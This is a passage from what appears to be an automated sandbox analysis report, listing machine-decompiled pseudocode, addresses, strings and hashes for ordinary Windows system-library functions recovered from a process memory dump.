					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0344f71d
0x0344f722
0x0344f726
0x03494770
0x0344f765
0x0344f769
0x0344f769
0x0344f732
0x0349477a
0x00000000
0x0349477a
0x0344f738
0x0344f73a
0x0344f73c
0x0344f73f
0x0344f746
0x0344f778
0x0344f7a9
0x0344f7a9
0x0344f754
0x0344f75a
0x0344f75d
0x0344f75f
0x0344f761
0x0344f76f
0x0344f771
0x0344f771
0x0344f76f
0x0344f763
0x00000000
0x0344f763
0x0344f77d
0x0344f7a3
0x0344f7a5
0x00000000
0x0344f7a5
0x0344f77f
0x0344f782
0x0344f784
0x0344f786
0x00000000
0x00000000
0x00000000
0x0344f788
0x0344f748
0x0344f74d
0x0344f78d
0x0344f793
0x0344f7b7
0x0344f7bc
0x00000000
0x0344f7bc
0x0344f798
0x00000000
0x00000000
0x0344f79d
0x0344f7b0
0x00000000
0x0344f7b0
0x0344f79f
0x00000000
0x0344f74f
0x0344f74f
0x00000000
0x0344f74f

Strings

Actx , xrefs: 0344F73F

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: c876832febed516f7873b0e8ebc1405623fe0cdbdcebca40f0790810f63aa65c
Instruction ID: 856c3542bccd04d44f378b8023e194f9fc5df757bb8110a0cc52f77a2f1e2ff5
Opcode Fuzzy Hash: c876832febed516f7873b0e8ebc1405623fe0cdbdcebca40f0790810f63aa65c
Instruction Fuzzy Hash: D41190397446028BFB24CE1D8B90737B299AB86624F28453BE471CF791DB78D84A8748

Uniqueness

Uniqueness Score: -1.00%

Function 034D8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E034D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3500d50);
				E0347D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E034B5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0347DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0347DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0347D130(_t34, _t39, _t40);
			}

0x034d8df1
0x034d8df1
0x034d8df1
0x034d8df1
0x034d8df1
0x034d8df1
0x034d8df3
0x034d8df8
0x034d8dfd
0x034d8e00
0x034d8e0e
0x034d8e2a
0x034d8e36
0x034d8e38
0x034d8e3c
0x034d8e46
0x034d8e46
0x034d8e36
0x034d8e50
0x034d8e56
0x034d8e59
0x034d8e5c
0x034d8e60
0x034d8e67
0x034d8e6d
0x034d8e73
0x034d8e74
0x034d8eb1
0x034d8ebd

Strings

Critical error detected %lx, xrefs: 034D8E21

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 8eb7f48143ccc6a3e8921816bcb6a4e3622458d2df26c93a56c4b66f5d57f172
Instruction ID: cabe79984ab49d29ccad83b017cd9bb0ff1769bf27605a8066f0b23599838449
Opcode Fuzzy Hash: 8eb7f48143ccc6a3e8921816bcb6a4e3622458d2df26c93a56c4b66f5d57f172
Instruction Fuzzy Hash: A21123B5D24348DADB29DFA989057EDBBB0AB05314F24425ED469AF292C3344602CF19

Uniqueness

Uniqueness Score: -1.00%

Function 034BFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 034BFF60

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 95afbf42ba6020e3855cdcf1a57e6400945c7ad50e350eca0c77b1f1999f71db
Instruction ID: 2cfcc3ebeaa324d5151f810858270cf137fea4819c52f6b7bb3c8bde7e1c96fe
Opcode Fuzzy Hash: 95afbf42ba6020e3855cdcf1a57e6400945c7ad50e350eca0c77b1f1999f71db
Instruction Fuzzy Hash: 3511E175920244EFDB12EF50CD48FD9BBB1FF09704F18845AE0086F2A1C7399954DB64

Uniqueness

Uniqueness Score: -1.00%

Function 034F5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E034F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3501178);
				E0347D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E034F4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0346D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E034F5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x35160e8;
								if( *0x35160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x35160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03469710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03466DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0346F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0346F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0346F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0346FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0346FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0346F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0346F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E034F4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0347D130(_t427, _t494, _t511);
				}
			}

0x034f5ba5
0x034f5baa
0x034f5baf
0x034f5bb4
0x034f5bb6
0x034f5bbc
0x034f5bbe
0x034f5bc4
0x034f5bcd
0x034f5bd3
0x034f5bd6
0x034f5bdc
0x034f5be0
0x034f5be3
0x034f5beb
0x034f5bf2
0x034f5bf8
0x034f5bfe
0x034f5c04
0x034f5c0e
0x034f5c18
0x034f5c1f
0x034f5c25
0x034f5c2a
0x034f5c2c
0x034f5c32
0x034f5c3a
0x034f5c3f
0x034f5c42
0x034f5c48
0x034f5c5b
0x034f5c5b
0x034f5c2c
0x034f5cb7
0x034f5cb9
0x034f5cbf
0x034f5cc2
0x034f5cca
0x034f5ccb
0x034f5ccb
0x034f5cd1
0x034f5cd7
0x034f5cda
0x034f5ce1
0x034f5ce4
0x034f5ce7
0x034f5ced
0x034f5cf3
0x034f5cf9
0x034f5cff
0x034f5d08
0x034f5d0a
0x034f5d0e
0x034f5d10
0x00000000
0x00000000
0x034f5d16
0x034f5d1a
0x00000000
0x00000000
0x034f5d20
0x034f5d22
0x034f5d25
0x034f5d2f
0x034f5d2f
0x034f5d33
0x034f5d3d
0x034f5d49
0x034f5d4b
0x00000000
0x00000000
0x034f5d5a
0x034f5d5d
0x034f5d60
0x00000000
0x00000000
0x034f5d66
0x034f5d69
0x00000000
0x00000000
0x034f5d6f
0x034f5d6f
0x034f5d73
0x034f5d79
0x034f5d7f
0x034f5d86
0x034f5d95
0x034f5d98
0x034f5dba
0x034f5dcb
0x034f5dce
0x034f5dd3
0x034f5dd6
0x034f5dd8
0x034f5de6
0x034f5dec
0x034f5dee
0x034f5df1
0x034f5df3
0x034f635a
0x034f635a
0x00000000
0x034f635a
0x034f5dfe
0x034f5e02
0x034f5e05
0x034f5e07
0x034f5e10
0x034f5e13
0x034f5e1b
0x034f5e1c
0x034f5e21
0x034f5e22
0x034f5e23
0x034f5e25
0x034f5e2a
0x034f5e2c
0x034f5e2e
0x034f5e36
0x034f5e39
0x034f5e42
0x034f5e47
0x034f5e4d
0x034f5e54
0x034f5e54
0x034f5e54
0x034f5e2e
0x034f5e5c
0x034f5e5f
0x034f5e62
0x034f5e64
0x034f5e6b
0x034f5e70
0x034f5e7a
0x034f5e7a
0x034f5e7a
0x034f5e6b
0x034f5e7e
0x034f5e7f
0x034f5e7f
0x034f5e81
0x034f5e87
0x034f5e8b
0x034f5e8c
0x034f5e8c
0x034f5e8c
0x034f5e9a
0x034f5e9c
0x034f5ea2
0x034f5ea6
0x034f5f50
0x034f5f50
0x034f5f57
0x034f5f66
0x034f5f66
0x034f5f66
0x034f5f68
0x034f5f6a
0x034f63d0
0x00000000
0x034f5f70
0x034f5f70
0x034f5f91
0x034f5f9c
0x034f5f9e
0x034f5fa4
0x034f5fa6
0x034f638c
0x034f6392
0x034f63a1
0x034f63a7
0x034f63af
0x034f63af
0x034f63bd
0x034f63d8
0x00000000
0x034f63d8
0x034f5fac
0x034f5fb2
0x034f5fb4
0x034f5fbd
0x034f5fc6
0x034f5fce
0x034f5fd4
0x034f5fdc
0x034f5fec
0x034f5fed
0x034f5fee
0x034f5fef
0x034f5ff9
0x034f5ffa
0x034f5ffb
0x034f5ffc
0x034f6000
0x034f6004
0x034f6012
0x034f6012
0x034f6018
0x034f6019
0x034f601a
0x034f601b
0x034f601c
0x034f6020
0x034f6059
0x034f605c
0x034f6061
0x034f6061
0x034f6022
0x034f6022
0x034f6022
0x034f6025
0x034f602a
0x034f602b
0x034f6031
0x034f6037
0x034f6038
0x034f603e
0x034f6048
0x034f6049
0x034f604a
0x034f604b
0x034f604c
0x034f604d
0x034f6053
0x034f6054
0x034f6054
0x034f6062
0x034f6065
0x034f6067
0x034f606a
0x034f6070
0x034f6075
0x034f6076
0x034f6081
0x034f6087
0x034f6095
0x034f6099
0x034f609e
0x034f60a4
0x034f60ae
0x034f60b0
